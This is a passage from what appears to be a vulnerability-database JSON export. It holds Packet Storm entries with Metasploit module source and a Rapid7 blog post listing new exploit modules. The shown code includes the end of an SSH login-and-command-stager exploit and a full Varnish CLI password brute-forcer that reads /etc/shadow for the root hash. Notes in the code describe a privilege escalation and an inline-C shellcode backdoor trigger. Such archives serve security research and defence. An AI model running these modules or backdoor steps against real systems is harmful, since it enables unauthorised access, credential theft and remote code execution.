\nopt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] \n \nbegin \nself.ssh_socket = Net::SSH.start(ip, user, opt_hash) \nrescue Rex::ConnectionError, Rex::AddressInUse \nfail_with(Exploit::Failure::Unreachable, 'Disconnected during negotiation') \nrescue Net::SSH::Disconnect, ::EOFError \nfail_with(Exploit::Failure::Disconnected, 'Timed out during negotiation') \nrescue Net::SSH::AuthenticationFailed \nfail_with(Exploit::Failure::NoAccess, 'Failed authentication') \nrescue Net::SSH::Exception => e \nfail_with(Exploit::Failure::Unknown, \"SSH Error: #{e.class} : #{e.message}\") \nend \n \nif not self.ssh_socket \nfail_with(Exploit::Failure::Unknown) \nend \nreturn \nend \n \ndef exploit \ndo_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT']) \n \nprint_status(\"#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Bourne stager...\") \nexecute_cmdstager({:linemax => 500}) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/121655/sshexec.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:20:57", "references": [], "edition": 1, "description": "", "reporter": "Patrick Webster", "published": "2014-12-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "packetstorm", "title": "Varnish Cache CLI Interface Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502", "CVE-2009-2936"], "modified": "2014-12-20T00:00:00", "href": "https://packetstormsecurity.com/files/129674/Varnish-Cache-CLI-Interface-Remote-Code-Execution.html", "id": "PACKETSTORM:129674", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Auxiliary::Report \ninclude Msf::Auxiliary::AuthBrute \ninclude Msf::Auxiliary::Scanner \n \ndef initialize \nsuper( \n'Name' => 'Varnish Cache CLI Interface Bruteforce Utility', \n'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce \nlist of passwords. This module will also attempt to read the /etc/shadow root password hash \nif a valid password is found. It is possible to execute code as root with a valid password, \nhowever this is not yet implemented in this module.', \n'References' => \n[ \n[ 'OSVDB', '67670' ], \n[ 'CVE', '2009-2936' ], \n# General \n[ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ], \n[ 'CVE', '1999-0502'] # Weak password \n], \n'Author' => [ 'patrick' ], \n'License' => MSF_LICENSE \n) \n \nregister_options( \n[ \nOpt::RPORT(6082), \nOptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\", \nFile.join(Msf::Config.data_directory, \"wordlists\", \"unix_passwords.txt\") ]), \n], self.class) \n \nderegister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS') \nend \n \ndef run_host(ip) \nconnect \nres = sock.get_once(-1,3) # detect banner \nif (res =~ /107 \\d+\\s\\s\\s\\s\\s\\s\\n(\\w+)\\n\\nAuthentication required./) # 107 auth \nvprint_status(\"Varnishd CLI detected - authentication required.\") \neach_user_pass { |user, pass| \nsock.put(\"auth #{Rex::Text.rand_text_alphanumeric(3)}\\n\") # Cause a login fail. \nres = sock.get_once(-1,3) # grab challenge \nif (res =~ /107 \\d+\\s\\s\\s\\s\\s\\s\\n(\\w+)\\n\\nAuthentication required./) # 107 auth \nchallenge = $1 \nsecret = pass + \"\\n\" # newline is needed \nresponse = challenge + \"\\n\" + secret + challenge + \"\\n\" \nresponse = Digest::SHA256.hexdigest(response) \nsock.put(\"auth #{response}\\n\") \nres = sock.get_once(-1,3) \nif (res =~ /107 \\d+/) # 107 auth \nvprint_status(\"FAILED: #{secret}\") \nelsif (res =~ /200 \\d+/) # 200 ok \nprint_good(\"GOOD: #{secret}\") \n \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => ('varnishd'), \n:pass => pass, \n:proof => \"#{res}\", \n:source_type => \"user_supplied\", \n:active => true \n) \n \nsock.put(\"vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\\n\") # only returns 1 line of any target file. \nres = sock.get_once(-1,3) \nif (res =~ /root:([\\D\\S]+):/) # lazy. \nif ($1[0] == \"!\") \nvprint_error(\"/etc/shadow root uid is disabled.\\n\") \nelse \nprint_good(\"/etc/shadow root enabled:\\nroot:#{$1}:\") \nend \nelse \nvprint_error(\"Unable to read /etc/shadow?:\\n#{res}\\n\") \nend \n \nbreak \nelse \nvprint_error(\"Unknown response:\\n#{res}\\n\") \nend \nend \n} \nelsif (res =~ /Varnish Cache CLI 1.0/) \nprint_good(\"Varnishd CLI does not require authentication!\") \nelse \nvprint_error(\"Unknown response:\\n#{res}\\n\") \nend \ndisconnect \nend \nend \n \n=begin \n \naushack notes: \n \n- varnishd typically runs as root, forked as unpriv. \n- 'param.show' lists configurable options. \n- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed. \n- 'user' is nobody. param.set user root (may have to stop/start the child to activate) \n- 'group' is nogroup. param.set group root (may have to stop/start the child to activate) \n- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail). \n- vcc_unsafe_path is on. used to 'import ../../../../file' etc. \n- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution. \n- code execution notes: \n \n* quotes must be escaped \\\" \n* \\n is a newline \n* C{ }C denotes raw C code. \n* e.g. C{ unsigned char shellcode[] = \\\"\\xcc\\\"; }C \n* #import <stdio.h> etc must be \"newline\", i.e. C{ \\n#include <stdlib.h>\\n dosomething(); }C (without 2x \\n, include statement will not interpret correctly). \n* C{ asm(\\\"int3\\\"); }C can be used for inline assembly / shellcode. \n* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic. \n* example trigger for backdoor: \n \nVCL server: \nvcl.inline foo \"vcl 4.0;\\nbackend b { . host = \\\"127.0.0.1\\\"; } sub vcl_recv { if (req.url ~ \\\"^/backd00r\\\") { C{ asm(\\\"int3\\\"); }C } } \\n\" \nvcl.use foo \nstart \n \nAttacker: \ntelnet target 80 \nGET /backd00r HTTP/1.1 \nHost: 127.0.0.1 \n \n(... wait for child to execute debug trap INT3 / shellcode). \n \nCLI protocol notes from website: \n \nThe CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end. \n \nRequests are whitespace separated tokens terminated by a newline (NL) character. \n \nTokens can be quoted with \"...\" and common backslash escape forms are accepted: (\\n), (\\r), (\\t), ( \n), (\\\"), (\\%03o) and (\\x%02x) \n \nThe response consists of a header which can be read as fixed format or ASCII text: \n \n1-3 %03d Response code \n4 ' ' Space \n5-12 %8d Length of body \n13 \\n NL character. \nFollowed by the number of bytes announced by the header. \n \nThe Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h: \n \nenum cli_status_e { \nCLIS_SYNTAX = 100, \nCLIS_UNKNOWN = 101, \nCLIS_UNIMPL = 102, \nCLIS_TOOFEW = 104, \nCLIS_TOOMANY = 105, \nCLIS_PARAM = 106, \nCLIS_OK = 200, \nCLIS_CANT = 300, \nCLIS_COMMS = 400, \nCLIS_CLOSE = 500 \n}; \n=end \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129674/varnishcache-exec.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "rapid7community": [{"lastseen": "2017-08-10T08:08:35", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "description": "<!-- [DocumentBodyStart:21bee29d-bc1c-445d-bbc8-c80143602f51] --><div class=\"jive-rendered-content\"><p>With Hacker Summer Camp 2017 wrapped up and folks now recovering from it, why not grab a drink and read up on what's new with Metasploit?</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Where there's smoke...</h2><p>At least <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fblob%2Fmaster%2Fdocumentation%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fipfire_oinkcode_exec.md\" rel=\"nofollow\" target=\"_blank\">a few versions</a> of open source firewall IPFire contain a post-auth RCE vulnerability, and we (well, you!) now have <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fipfire_oinkcode_exec\" target=\"_blank\">a module to help exploit that</a>. Due to how an incoming <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.snort.org%2Foinkcodes\" rel=\"nofollow\" target=\"_blank\">Snort Oinkcode</a> is processed via HTTP POST request, the IPFire software leaves itself open for shoving a payload in as the Oinkcode and having it executed. Like throwing water on an IPFire...</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Razer's edge</h2><p>Synapse, a computer peripheral configuration application from popular peripheral device vendor <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.razerzone.com%2F\" rel=\"nofollow\" target=\"_blank\">Razer</a>, contains an access control vulnerability in their rzpnk.sys driver. Exploiting this vuln allows privilege escalation, including reading and writing of other process' memory and remote code execution. And there's a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Flocal%2Frazer_zwopenprocess\" target=\"_blank\">new module for this</a>. As of this writing, this vulnerability has not yet been patched (and considering Synapse will auto-install on peripheral connect&mdash;at least under Windows 10&mdash;there may be many susceptible targets out there!).</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Scanner Lightly</h2><p>And we've landed a few new aux modules for your scanning pleasure: <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Frdp%2Frdp_scanner\" target=\"_blank\">RDP</a> and <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fnntp%2Fnntp_login\" target=\"_blank\">NNTP</a>. While RDP is likely familiar to many readers, NNTP (<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FNetwork_News_Transfer_Protocol\" rel=\"nofollow\" target=\"_blank\">Network News Transfer Protocol</a>) might be less so. But you never know what a target might be running...</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Mo' Meterpreter</h2><p>We've had some improvements to a couple of our Meterpreters to share.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><em>Windows Meterpreter</em></p><ul><li>screen capture of <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwiki.archlinux.org%2Findex.php%2FHiDPI\" rel=\"nofollow\" target=\"_blank\">HiDPI</a> screen is now supported (and captures the full screen)</li><li>new threads are now automatically setup to not throw a dialog box or crash notification on failure</li></ul><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><em>macOS/OSX Meterpreter</em></p><ul><li>native-code Meterpreter now available</li><li>microphone audio streaming is supported</li></ul><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Feed me, RSS!</h2><p>Had a desire to follow what your sessions are up to via an RSS feed? If so, rejoice! There's now a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8612\" rel=\"nofollow\" target=\"_blank\">new framework plugin</a> for doing exactly that thanks to <span class=\"citation\">@mubix</span>.</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Rise of the robots.txt</h2><p>In an effort to make framework's HttpServer a bit less leaky, <span class=\"citation\">@dbfarrow</span> added the ability to serve up a <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpull%2F8735\" rel=\"nofollow\" target=\"_blank\">canned 'plz no crawl/index my pagez' robot.txt response</a> for clients who request it. And, for those clients who do request it and honor it, that canned response should be enough to shoo them off from accessing files HttpServer is hosting...</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>New Modules</h2><p><em>Exploit modules</em> <em>(5 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fhttp%2Fipfire_oinkcode_exec\" target=\"_blank\">IPFire proxy.cgi RCE</a> by 0x09AL and h00die</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fmulti%2Fmisc%2Fmsf_rpc_console\" target=\"_blank\">Metasploit RPC Console Command Execution</a> by Brendan Coles</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Funix%2Fwebapp%2Fvicidial_user_authorization_unauth_cmd_exec\" target=\"_blank\">VICIdial user_authorization Unauthenticated Command Execution</a> by Brendan Coles</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fhttp%2Feasychatserver_seh\" target=\"_blank\">Easy Chat Server User Registeration Buffer Overflow (SEH)</a> by Aitezaz Mohsin and Marco Rivoli</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Flocal%2Frazer_zwopenprocess\" target=\"_blank\">Razer Synapse rzpnk.sys ZwOpenProcess</a> by Spencer McIntyre exploits CVE-2017-9769</li></ul><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><em>Auxiliary and post modules</em> <em>(2 new)</em></p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fnntp%2Fnntp_login\" target=\"_blank\">NNTP Login Utility</a> by Brendan Coles exploits CVE-1999-0502</li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Frdp%2Frdp_scanner\" target=\"_blank\">Identify endpoints speaking the Remote Desktop Protocol (RDP)</a> by Jon Hart</li></ul><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with <code>msfupdate</code> and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fpulls%3Fq%3Dis%3Apr%2Bmerged%3A%25222017-07-12T17%3A05%3A27-05%3A00%2B..%2B2017-07-28T09%3A59%3A11-07%3A00%2522\" rel=\"nofollow\" target=\"_blank\">Pull Requsts 4.15.0...4.15.4</a></li><li><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fcompare%2F4.15.0...4.15.4\" rel=\"nofollow\" target=\"_blank\">Full diff 4.15.0...4.15.4</a></li></ul><p>To install fresh, check out the open-source-only <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fgithub.com%2Frapid7%2Fmetasploit-framework%2Fwiki%2FNightly-Installers\" rel=\"nofollow\" target=\"_blank\">Nightly Installers</a>, or the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload.jsp\" target=\"_blank\">binary installers</a> which also include the commercial editions.</p></div><!-- [DocumentBodyEnd:21bee29d-bc1c-445d-bbc8-c80143602f51] -->", "reporter": "Pearce Barry", "published": "2017-08-07T13:34:12", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Metasploit Wrapup", "type": "rapid7community", "bulletinFamily": "blog", "cvelist": ["CVE-1999-0502", "CVE-2017-9769"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2017-08-07T13:34:12", "id": "RAPID7COMMUNITY:617B5BC20B34DB327AAA03E2FFF1602C", "href": "https://community.rapid7.com/community/metasploit/blog/2017/08/04/metasploit-wrapup", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}